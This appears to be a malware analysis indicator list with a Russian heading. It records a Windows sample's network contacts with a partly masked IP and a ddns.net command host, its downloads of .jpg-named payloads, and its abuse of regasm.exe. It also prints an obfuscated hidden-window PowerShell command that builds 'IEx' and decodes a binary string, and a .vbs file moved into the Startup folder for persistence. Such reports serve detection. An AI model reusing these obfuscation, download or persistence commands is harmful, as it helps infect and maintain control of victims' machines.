Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- '13.##5.140.3':80
- 'me##.ddns.net':45901
- http://13.##5.140.3/OC2.jpg
- http://13.##5.140.3/OC1.jpg
- 'me##.ddns.net':45901
- DNS ASK google.com
- DNS ASK me##.ddns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'